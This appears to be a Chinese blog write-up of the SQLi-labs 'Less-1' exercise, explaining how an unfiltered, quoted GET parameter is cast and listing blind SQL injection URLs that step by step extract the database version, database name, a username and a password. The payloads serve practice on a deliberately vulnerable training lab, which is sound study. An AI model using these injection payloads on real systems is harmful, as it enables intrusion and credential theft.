这是Less-1输入变量部分的源码,可以看到对于直接GET进来的文本没有过滤。
同时,在查询语句中,id=’$id’,变量加了引号。这里引号的意思是把输入的id当做字符串来处理,取从头开始的最长数字且类型转换为整形进行查询。
?id=12a 显示id为12的用户
?id=1a2a 显示id为1的用户
?id=102a 显示id为102的用户(不存在)
盲注
?id=1%27and+left(version(),1)=5%23 得出数据库版本为5开头
?id=1%27and+length(database())=8%23 数据库名长度为8
?id=1%27and+left(database(),8)='security'%23 数据库为security
?id=1%27and+length(username)=4%23 用户名长度为4
?id=1%27and+left(username,4)='Dumb'%23 用户名为Dumb
?id=1%27and+length(password)=4%23 密码长度为4
?id=1%27and+left(password,4)='Dumb'%23 密码为Dumb
虽然,他的密码已经摆在面上了- -但是还是可以练习一下的。
FROM :rickyhao.com | rickyhao.com
相关推荐: XSS:RPO(Relative Path Overwrite)攻击
0x00 具体原理参考: Infinite Security: (Relative Path Overwrite) RPO XSS RPO Gadgets RPO攻击 0x01 RPO攻击首先利用的是通过相对路径引入的CSS,如 <link href="…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论